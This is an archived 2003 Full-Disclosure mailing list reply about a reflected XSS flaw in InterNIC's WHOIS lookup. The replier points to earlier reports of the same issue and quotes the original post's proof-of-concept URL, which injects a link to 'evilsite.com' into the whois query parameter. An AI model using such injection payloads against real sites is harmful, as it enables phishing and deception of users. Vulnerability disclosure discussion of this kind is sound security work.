[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] INTERNIC WHOIS untrusted link XSS

To: <full-disclosure@lists.netsys.com>
Subject: Re: [Full-Disclosure] INTERNIC WHOIS untrusted link XSS
From: "Pistone" <jorge@pistone.com.ar>
Date: Thu, 2 Oct 2003 19:12:51 -0300

Aha,

Jul 23 2002 5:19AM
http://www.securityfocus.com/archive/82/283724/2002-07-17/2002-07-23/0
20 May 2003 00:29:17
http://lists.netsys.com/pipermail/full-disclosure/2003-May/005092.html


>untrusted link XSS


> untrusted link XSS ...
>
http://www-whois.internic.net/cgi/whois?whois_nic=%3Ca+href%3Dhttp%3A%2F%2Fe
> vilsite.com%3Eclick%20here%20for%20results%3C%2Fa%3E&type=domain
>
> or any xss you wish to embed is also OK
> morning_wood ( XSS king )   <--  (XSS CopyKing)



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] INTERNIC WHOIS untrusted link XSS
  - From: "morning_wood" <se_cur_ity@hotmail.com>

Prev by Date: Re: [Full-Disclosure] Class-action suit points to Microsoft security flaws
Next by Date: [Full-Disclosure] UnixWare 7.1.3 Open UNIX 8.0.0 UnixWare 7.1.1 : OpenSSL Multiple Vulnerabilities
Previous by thread: [Full-Disclosure] INTERNIC WHOIS untrusted link XSS
Next by thread: [Full-Disclosure] Asynchronous, industry-wide virus naming scheme proposed
Index(es):
- Date
- Thread